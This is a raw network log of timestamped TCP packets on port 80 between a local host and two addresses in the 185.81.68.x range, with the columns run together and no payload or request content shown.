                                                                                                                                                                                                Dec 13, 2024 08:21:47.007522106 CET8050144185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:47.007641077 CET5014480192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:47.007700920 CET5014480192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:47.127486944 CET8050144185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:47.127639055 CET5014480192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:47.247484922 CET8050144185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:47.941824913 CET5014180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:47.942142010 CET5014580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:47.942272902 CET5014280192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:21:47.942503929 CET5014680192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:21:48.061990976 CET8050145185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:48.062011003 CET8050141185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:48.062068939 CET5014580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:48.062097073 CET5014180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:48.062169075 CET8050146185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:48.062256098 CET5014680192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:21:48.062474966 CET8050142185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:48.062521935 CET5014280192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:21:48.070777893 CET5014580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:48.070884943 CET5014680192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:21:48.190704107 CET8050145185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:48.190721989 CET8050146185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:48.648940086 CET8050144185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:48.649211884 CET8050144185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:48.649281025 CET5014480192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:48.650818110 CET5014480192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:48.762619972 CET5014780192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:48.770579100 CET8050144185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:48.882492065 CET8050147185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:48.883245945 CET5014780192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:48.883409023 CET5014780192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:49.003190994 CET8050147185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:49.003303051 CET5014780192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:49.123119116 CET8050147185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:49.426518917 CET8050146185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:49.426626921 CET5014680192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:21:49.442502022 CET8050145185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:49.442606926 CET5014580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:50.478684902 CET8050147185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:50.478709936 CET8050147185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:50.478800058 CET5014780192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:50.480108023 CET5014780192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:50.590742111 CET5014880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:50.599935055 CET8050147185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:50.710622072 CET8050148185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:50.710786104 CET5014880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:50.710850000 CET5014880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:50.830552101 CET8050148185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:50.830637932 CET5014880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:50.950433969 CET8050148185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:51.139959097 CET5014680192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:21:51.140161991 CET5014980192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:21:51.216193914 CET5014580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:51.216532946 CET5015080192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:51.260035038 CET8050149185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:51.260135889 CET5014980192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:21:51.260359049 CET8050146185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:51.260907888 CET5014680192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:21:51.270024061 CET5014980192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:21:51.336261988 CET8050145185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:51.336294889 CET8050150185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:51.336366892 CET5014580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:51.336447954 CET5015080192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:51.360795975 CET5015080192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:51.389868975 CET8050149185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:51.480668068 CET8050150185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:52.338778973 CET8050148185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:52.339035988 CET8050148185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:52.339240074 CET5014880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:52.358997107 CET5014880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:52.465795040 CET5015180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:52.478693008 CET8050148185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:52.585581064 CET8050151185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:52.585808992 CET5015180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:52.585808992 CET5015180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:52.613429070 CET8050149185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:52.613527060 CET5014980192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:21:52.690679073 CET8050150185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:52.690819979 CET5015080192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:52.705529928 CET8050151185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:52.705625057 CET5015180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:52.825356007 CET8050151185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:54.193908930 CET8050151185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:54.194168091 CET8050151185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:54.194230080 CET5015180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:54.195285082 CET5015180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:54.309379101 CET5015280192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:54.316138029 CET8050151185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:54.397093058 CET5014980192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:21:54.397430897 CET5015380192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:21:54.429156065 CET8050152185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:54.429284096 CET5015280192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:54.429352045 CET5015280192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:54.432172060 CET5015080192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:54.432491064 CET5015480192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:54.517429113 CET8050153185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:54.517482042 CET8050149185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:54.517556906 CET5015380192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:21:54.519360065 CET5014980192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:21:54.539630890 CET5015380192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:21:54.549137115 CET8050152185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:54.549185038 CET5015280192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:54.552252054 CET8050154185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:54.552305937 CET8050150185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:54.552314997 CET5015480192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:54.552367926 CET5015080192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:54.552906990 CET5015480192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:54.659511089 CET8050153185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:54.668909073 CET8050152185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:54.672558069 CET8050154185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:55.862215996 CET8050153185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:55.862288952 CET5015380192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:21:55.893322945 CET8050154185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:55.893378019 CET5015480192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:56.071329117 CET8050152185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:56.071384907 CET8050152185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:56.071578026 CET5015280192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:56.072817087 CET5015280192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:56.184482098 CET5015580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:56.192476034 CET8050152185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:56.304462910 CET8050155185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:56.304689884 CET5015580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:56.304689884 CET5015580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:56.424603939 CET8050155185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:56.424688101 CET5015580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:56.544756889 CET8050155185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:57.589205980 CET5015380192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:21:57.589713097 CET5015680192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:21:57.589858055 CET5015480192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:57.590538025 CET5015780192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:57.709393978 CET8050153185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:57.709456921 CET8050156185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:57.709460974 CET5015380192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:21:57.709530115 CET5015680192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:21:57.710021973 CET8050154185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:57.710089922 CET5015480192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:57.710325956 CET8050157185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:57.710531950 CET5015780192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:57.724216938 CET5015680192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:21:57.724621058 CET5015780192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:57.844773054 CET8050156185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:57.844995975 CET8050157185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:57.916450977 CET8050155185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:57.916527033 CET8050155185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:57.916652918 CET5015580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:57.917908907 CET5015580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:58.028217077 CET5015880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:58.037620068 CET8050155185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:58.148071051 CET8050158185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:58.148272991 CET5015880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:58.148272991 CET5015880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:58.268152952 CET8050158185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:58.268234968 CET5015880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:58.387928009 CET8050158185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:59.065141916 CET8050156185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:59.065339088 CET8050157185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:59.065367937 CET5015680192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:21:59.065431118 CET5015780192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:59.748713017 CET8050158185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:59.748776913 CET8050158185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:59.748939991 CET5015880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:59.750087023 CET5015880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:59.856858969 CET5015980192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:59.869818926 CET8050158185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:59.976747036 CET8050159185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:21:59.976887941 CET5015980192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:21:59.976943970 CET5015980192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:00.096856117 CET8050159185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:00.097253084 CET5015980192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:00.217216969 CET8050159185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:00.751966000 CET5015780192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:00.752454996 CET5016080192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:00.780510902 CET5015680192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:22:00.780854940 CET5016180192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:22:00.872582912 CET8050157185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:00.872601986 CET8050160185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:00.872649908 CET5015780192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:00.872817993 CET5016080192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:00.888278008 CET5016080192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:00.900765896 CET8050156185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:00.900779963 CET8050161185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:00.900827885 CET5015680192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:22:00.900974035 CET5016180192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:22:00.948925018 CET5016180192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:22:01.008136034 CET8050160185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:01.068775892 CET8050161185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:01.595606089 CET8050159185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:01.595729113 CET8050159185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:01.595804930 CET5015980192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:01.597070932 CET5015980192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:01.700123072 CET5016280192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:01.716902018 CET8050159185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:01.820250034 CET8050162185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:01.820389032 CET5016280192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:01.820389032 CET5016280192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:01.940351963 CET8050162185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:01.940480947 CET5016280192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:02.060389042 CET8050162185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:02.206060886 CET8050160185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:02.206377029 CET5016080192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:02.236259937 CET8050161185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:02.236473083 CET5016180192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:22:03.436482906 CET8050162185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:03.436572075 CET8050162185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:03.436633110 CET5016280192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:03.437948942 CET5016280192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:03.543844938 CET5016380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:03.557857990 CET8050162185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:03.663819075 CET8050163185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:03.663979053 CET5016380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:03.663979053 CET5016380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:03.758282900 CET5016080192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:03.758517027 CET5016480192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:03.783718109 CET8050163185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:03.783879995 CET5016380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:03.796845913 CET5016180192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:22:03.797557116 CET5016580192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:22:03.878284931 CET8050164185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:03.878402948 CET5016480192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:03.878437996 CET8050160185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:03.878695011 CET5016080192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:03.888216972 CET5016480192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:03.903637886 CET8050163185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:03.917207003 CET8050161185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:03.917236090 CET8050165185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:03.917375088 CET5016580192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:22:03.917409897 CET5016180192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:22:03.928824902 CET5016580192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:22:04.007975101 CET8050164185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:04.048665047 CET8050165185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:04.885937929 CET4997780192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:22:04.886055946 CET4996880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:05.209073067 CET4996980192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:05.209074020 CET4997880192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:22:05.231077909 CET4996880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:05.237787008 CET8050164185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:05.237840891 CET5016480192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:05.267927885 CET8050165185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:05.267998934 CET5016580192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:22:05.287003994 CET8050163185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:05.287399054 CET8050163185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:05.287473917 CET5016380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:05.288697004 CET5016380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:05.324811935 CET4997780192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:22:05.408422947 CET8050163185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:05.410967112 CET5016680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:05.512334108 CET4996980192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:05.530700922 CET8050166185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:05.530873060 CET5016680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:05.530873060 CET5016680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:05.629190922 CET4997880192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:22:05.651782036 CET8050166185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:05.652060032 CET5016680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:05.771842003 CET8050166185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:05.924689054 CET4998280192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:22:05.924875021 CET4997280192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:05.934236050 CET4996880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:06.012305975 CET4997780192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:22:06.121578932 CET4996980192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:06.225123882 CET4997280192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:06.418540001 CET4998280192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:22:06.434079885 CET4997880192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:22:06.935343027 CET5016480192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:06.935487032 CET5016780192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:06.982206106 CET8050166185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:06.982286930 CET8050166185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:06.982449055 CET5016680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:06.983686924 CET4997280192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:06.983848095 CET5016680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:07.045090914 CET5016580192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:22:07.045342922 CET5016880192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:22:07.055217981 CET8050167185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:07.055501938 CET8050164185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:07.055600882 CET5016480192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:07.056983948 CET5016780192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:07.057207108 CET5016780192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:07.090861082 CET5016980192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:07.103630066 CET8050166185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:07.121568918 CET4998280192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:22:07.165258884 CET8050168185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:07.165298939 CET8050165185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:07.165456057 CET5016580192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:22:07.165457010 CET5016880192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:22:07.167603016 CET5016880192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:22:07.176839113 CET8050167185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:07.210715055 CET8050169185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:07.213001966 CET5016980192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:07.213072062 CET5016980192.168.2.11185.81.68.147
